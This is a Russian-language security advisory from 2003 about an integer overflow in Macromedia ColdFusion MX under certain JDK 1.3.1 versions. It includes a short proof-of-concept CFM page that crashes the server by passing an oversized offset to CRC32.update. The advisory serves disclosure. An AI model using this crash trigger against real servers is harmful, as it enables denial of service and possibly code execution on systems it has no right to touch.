Удаленное переполнение буфера в Macromedia Coldfusion MX
| Дата публикации: | 30.04.2003 |
| Всего просмотров: | 1278 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Целочисленное переполнение буфера обнаружено в coldfusion mx, в связанной java virtual machine. Удаленный атакующий может аварийно завершить работу программы или выполнить произвольный код на целевом сервере. Сообщается, что coldfusion mx аварийно завершит работу при попытке обработать некорректную CFM страницу. Так как уязвимость связанна с целочисленным переполнением буфера, то она может использоваться для выполнения произвольного кода. Пример: <H1> Coldfusion MX crash with Java </h1> <h2> Marc Schoenefeld @ illegalaccess.org </h2> <cfapplication name="Marc" sessionmanagement="yes"> <cfobject action="create" type="Java" class="java.lang.String" name="s"> <cfobject action="create" type="Java" class="java.util.zip.CRC32" name="c"> <cfset ret=s.init()> <cfset ret=c.init()> <cfset str = s.getBytes()> <cfset retval = c.update(str,2147483647,4)>Уязвимость обнаружена в Macromedia Coldfusion MX с jdk 1.3.1 Level _03 до _07 |
| Ссылки: | Coldfusion MX: Java in CFM causes Crash |